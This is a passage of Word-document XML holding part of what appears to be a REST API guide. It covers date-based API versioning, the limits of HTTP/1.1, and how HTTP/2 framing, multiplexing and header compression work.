        <w:t xml:space="preserve">  New features: added to all versions (backward-compatible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC8127A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Breaking changes: new date version, existing keys unaffected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F79B3E1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Customer upgrades: update version on API key settings page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF6853F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6298CE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  This is arguably the best versioning model for production APIs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478CE549" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Clients never automatically receive breaking changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0345022E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Developers control when to upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09715E54" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Old versions can be sunset with advance notice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3C7829" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/1.1 vs HTTP/2 — The Transport Foundation of REST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DA9DD7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/1.1 limitations that drive REST performance problems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E633AC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E591CFC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>HTTP/1.1 connection semantics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB9BEAC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="0FD49F22" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>One request per connection at a time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE99C3D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Request → Response → Request → Response → ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1BB58A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Sequential within one connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05103FD6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6D99E8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  "Head-of-line blocking": if first request is slow, all subsequent requests wait</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B636B8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675DF7B9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Workaround: connection pooling (open multiple connections)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF56DF8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Browsers: 6 connections per origin (Chrome, Firefox default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54887CF0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    6 connections × 1 request each = 6 concurrent requests maximum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132DE5B9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D29836" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Consequence: REST API clients open many parallel connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44263DB0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    At 100 concurrent API calls: need 100 connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A195C43" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Each connection: TCP handshake + (TLS handshake) → latency overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F52938" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Connection pool: reuse connections → reduces handshake overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3B09A2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    But: connections consume kernel resources (file descriptors, memory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CED5FD8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="3982D310" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Request/response headers: uncompressed text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE7CE5F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Every request sends: Host, User-Agent, Accept, Authorization, Content-Type, ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E5103D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Authorization header: "Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6Ikp..." (large JWT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ACEC92" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFC72E8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  For small API payloads (e.g., 50-byte JSON body):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED10E43" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Headers: 500-2000 bytes (10-40× larger than payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351D1454" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Wire: mostly headers, very little payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A1BB40" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52994CD5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Redundancy: same headers sent on every request (User-Agent, Accept, Authorization...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E256543" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">              no compression between requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAAAC08" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="3D968FF0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Upgrade path: HTTP/1.1 → HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541CCCA4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  HTTP/2: multiplexed streams, header compression, binary framing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE3A357" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  REST APIs benefit from HTTP/2 transparently (same HTTP semantics, better transport)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFE32CD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EF8F0E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Nginx HTTP/2: listen 443 ssl http2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054FE8DA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Load balancers: AWS ALB, GCP Load Balancer → HTTP/2 to clients automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A4A1B9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="77DD2EB0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>HTTP/1.1 keep-alive (persistent connections):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B551922" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Connection: keep-alive (default in HTTP/1.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB22FA8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Reuse TCP connection for multiple requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DAEEB5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A049C2E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  But: still sequential within connection (one request at a time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE83F18" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Performance: better than closing/reopening per request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C93FE8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">               worse than HTTP/2 multiplexing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A565FE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2 binary framing — how it fixes HTTP/1.1 problems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1446C2C1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AA14CA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>HTTP/2 framing layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEC8FCF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="6A55A694" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Frame: smallest unit of communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E46650" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ┌─────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F35F024" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  │ Length (24 bits)                │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134A7045" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  │ Type (8 bits)                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C1BCB7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  │ Flags (8 bits)                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0871946C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  │ Stream Identifier (31 bits)     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0857A1D8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  │ Frame Payload (variable)        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E88E32" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  └─────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A3ECE2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C34FFA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Frame types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DFF44D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  DATA:         request/response body data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ABF695" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  HEADERS:      header fields (HPACK compressed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181F65FB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  PRIORITY:     stream priority (deprecated in HTTP/3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07981C56" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  RST_STREAM:   terminate a stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7183D406" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  SETTINGS:     connection parameters (window sizes, max streams)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6969E0A4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  PUSH_PROMISE: server push (server preemptively sends resources)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDBD42A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  PING:         heartbeat / RTT measurement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156707E8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  GOAWAY:       graceful connection shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA70F0C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  WINDOW_UPDATE: flow control credit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF908F1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  CONTINUATION: continuation of HEADERS frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD8C744" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="2A613AA5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Multiplexing — the key HTTP/2 innovation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F139598" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Stream: virtual request-response pair within one TCP connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5ED743" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Multiple streams simultaneously on ONE connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7506AD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168DCC74" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Connection: TCP connection (one socket)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E93B0E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Stream 1: GET /users/123 (in progress)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B7BC7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Stream 2: POST /orders (in progress simultaneously)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30184627" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Stream 3: GET /products?category=shoes (in progress simultaneously)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E481D3C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F966330" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Frames from all streams interleaved on the wire:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6767DA7D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  [S1:HEADERS][S2:HEADERS][S3:HEADERS][S2:DATA][S1:DATA][S3:DATA][S2:HEADERS][...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1635D424" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A181DAE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  No head-of-line blocking at application layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A376351" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    S1 response is slow (server processing 200ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EA02BA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    S2 and S3: proceed normally, not blocked by S1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61776D6A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAD5F2A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  (Note: TCP-level HOL blocking still exists — packet loss stalls ALL streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F289810" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">         HTTP/3/QUIC solves this with UDP-based transport)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135E746F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="29A578E7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>HPACK header compression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1C00B2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Problem: HTTP/1.1 sends full headers every request (redundant, large)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69539124" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
